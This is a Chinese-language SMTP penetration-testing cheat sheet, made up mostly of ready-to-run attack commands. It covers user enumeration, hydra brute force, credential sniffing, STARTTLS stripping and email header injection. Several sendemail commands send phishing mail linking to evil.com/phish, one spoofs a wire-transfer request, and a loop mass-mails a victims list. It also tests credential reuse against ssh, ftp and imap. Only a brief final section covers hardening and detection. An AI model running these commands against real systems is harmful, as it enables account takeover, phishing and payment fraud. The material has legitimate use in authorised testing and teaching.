25/465/587 - SMTP 服务渗透测试

# nmap 扫描
nmap -sV --script smtp-commands,smtp-enum-users,smtp-open-relay -p 25 TARGET

# 手动连接
nc TARGET 25
EHLO attacker.com

# 输出示例：
# 220 mail.target.com ESMTP Postfix
# 250-mail.target.com
# 250-SIZE 10240000
# 250-AUTH LOGIN PLAIN
# 250-STARTTLS
# 250 8BITMIME

# VRFY 命令 (验证用户)
nc TARGET 25
VRFY admin
# 250 <[email protected]> - 用户存在
# 550 User unknown - 用户不存在

# EXPN 命令 (展开邮件列表)
nc TARGET 25
EXPN developers
# 250 [email protected]
# 250 [email protected]

# RCPT TO 测试
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
# 250 OK - 用户存在
# 550 User unknown - 用户不存在

# smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t TARGET
smtp-user-enum -M EXPN -U users.txt -t TARGET
smtp-user-enum -M RCPT -U users.txt -t TARGET

# nmap 脚本
nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -p 25 TARGET

# hydra 暴力破解
hydra -l admin -P passwords.txt smtp://TARGET

# nmap 检测
nmap --script smtp-open-relay -p 25 TARGET

# 手动测试
nc TARGET 25
HELO attacker.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Test
This is a test message.
.
# 如果 250 OK，说明是开放中继

# 发送钓鱼邮件
sendemail -f [email protected] -t [email protected] \
  -u "Urgent: Password Reset" \
  -m "Click here to reset your password: http://evil.com/phish" \
  -s TARGET:25

# 批量发送
for email in $(cat victims.txt); do
    sendemail -f [email protected] -t $email \
      -u "Account Verification" \
      -m "Please verify your account" \
      -s TARGET:25
done

# 1. 嗅探流量
tshark -i eth0 -Y "smtp" -T fields -e smtp.req.command -e smtp.req.argument

# 2. 解码 Base64
echo "BASE64_CREDENTIALS" | base64 -d
# 输出：\0username\0password

# 3. 暴力破解
hydra -l admin -P passwords.txt smtp://TARGET
hydra -C userpass.txt smtp://TARGET

# 4. 使用获取的凭据
sendemail -f [email protected] -t [email protected] \
  -xu admin -xp password \
  -u "Important" -m "Message" -s TARGET:587

# Python 示例
import smtplib
from email.mime.text import MIMEText

# 恶意输入
subject = "Test\nBcc:[email protected]\nBcc:[email protected]"
body = "Message body"

msg = MIMEText(body)
msg['Subject'] = subject
msg['From'] = '[email protected]'
msg['To'] = '[email protected]'

# 发送
server = smtplib.SMTP('TARGET', 25)
server.sendmail('[email protected]', ['[email protected]'], msg.as_string())

# 1. 拦截 STARTTLS 命令
# 使用 MITM 工具

# 2. 删除 STARTTLS 响应
# 客户端回退到明文

# 3. 嗅探凭据
tshark -i eth0 -Y "smtp" -T fields -e smtp.auth

# 防御：强制 STARTTLS
# 配置服务器要求加密

# 检查 SPF
dig target.com TXT
# v=spf1 include:_spf.google.com ~all

# 检查 DKIM
dig default._domainkey.target.com TXT

# 检查 DMARC
dig _dmarc.target.com TXT
# v=DMARC1; p=none; rua=mailto:[email protected]

# 如果 SPF 配置为 ~all (softfail)
# 可尝试发送伪造邮件

sendemail -f [email protected] -t [email protected] \
  -u "Urgent: Wire Transfer" \
  -m "Please process this wire transfer immediately" \
  -s TARGET:25

# 如果 SPF/DKIM 未配置
# 邮件可能通过验证

# 1. 枚举有效用户
smtp-user-enum -M VRFY -U common_users.txt -t TARGET

# 输出：
# VRFY [email protected] ... 250 <[email protected]>
# VRFY [email protected] ... 250 <[email protected]>
# VRFY [email protected] ... 550 User unknown

# 2. 保存有效用户
echo "[email protected]" > valid_users.txt
echo "[email protected]" >> valid_users.txt

# 3. 暴力破解
hydra -L valid_users.txt -P rockyou.txt smtp://TARGET

# 4. 获取凭据
# admin:Password123!

# 1. 检测开放中继
nmap --script smtp-open-relay -p 25 TARGET

# 2. 发送钓鱼邮件
sendemail -f [email protected] -t [email protected] \
  -u "Account Suspended" \
  -m "Your account has been suspended. Click here: http://evil.com/phish" \
  -s TARGET:25

# 3. 批量发送
while read email; do
    sendemail -f [email protected] -t $email \
      -u "Order Confirmation" \
      -m "Your order has been shipped" \
      -s TARGET:25
done < victim_list.txt

# 1. 连接 SMTP
nc TARGET 25
EHLO attacker.com

# 2. 获取内部信息
# 220 mail.internal.target.com ESMTP
# 邮件服务器主机名泄露内网域名

# 3. 枚举邮件列表
VRFY postmaster
EXPN all-staff

# 4. 收集邮箱地址
# 用于钓鱼攻击

# 1. 获取 SMTP 凭据
# 通过网络嗅探或暴力破解

# 2. 测试凭据重用
hydra -l admin -p Password123! ssh://TARGET
hydra -l admin -p Password123! ftp://TARGET
hydra -l admin -p Password123! imap://TARGET

# 3. 访问邮箱
sendemail -xu admin -xp Password123! \
  -f [email protected] -t [email protected] \
  -u "Test" -m "Testing" -s TARGET:587

# VRFY 枚举
smtp-user-enum -M VRFY -U users.txt -t TARGET

# EXPN 枚举
smtp-user-enum -M EXPN -U users.txt -t TARGET

# RCPT TO 枚举
smtp-user-enum -M RCPT -U users.txt -t TARGET

# 批量扫描
smtp-user-enum -M VRFY -U users.txt -T targets.txt

# 发送测试邮件
swaks --to [email protected] --from [email protected] --server TARGET

# 认证发送
swaks --to [email protected] --from [email protected] \
  --server TARGET --auth-user admin --auth-password pass

# 测试开放中继
swaks --to [email protected] --from [email protected] \
  --server TARGET --header "Subject: Test"

# SMTP 命令枚举
nmap --script smtp-commands -p 25 TARGET

# 用户枚举
nmap --script smtp-enum-users -p 25 TARGET

# 开放中继检测
nmap --script smtp-open-relay -p 25 TARGET

# 安全策略
nmap --script smtp-security-flags -p 25 TARGET

# SMTP 枚举
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS TARGET
set USER_FILE users.txt
run

# 开放中继检测
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS TARGET
run

# Postfix 配置

# 1. 禁用 VRFY/EXPN
smtpd_restrictions =
    reject_unknown_recipient_domain,
    reject_unauth_pipelining,
    reject_non_fqdn_sender,
    reject_non_fqdn_recipient

# 2. 限制中继
mynetworks = 127.0.0.0/8, 192.168.1.0/24
relay_domains = $mydestination

# 3. 强制认证
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous

# 4. 强制加密
smtpd_tls_security_level = encrypt
smtpd_tls_auth_only = yes

# 5. 速率限制
smtpd_client_connection_rate_limit = 10
smtpd_client_recipient_rate_limit = 50

# 1. SPF 记录
# DNS TXT record
v=spf1 include:_spf.google.com -all

# 2. DKIM 签名
# 使用 OpenDKIM 签名邮件

# 3. DMARC 策略
# DNS TXT record (_dmarc.target.com)
v=DMARC1; p=reject; rua=mailto:[email protected]

# 1. 日志监控
grep "relay=" /var/log/mail.log
grep "auth=" /var/log/mail.log

# 2. 异常检测
# 大量外发邮件
# 未知 IP 认证
# 失败登录尝试

# 3. 流量分析
tshark -i eth0 -Y "smtp" -T fields -e ip.src -e smtp.req.command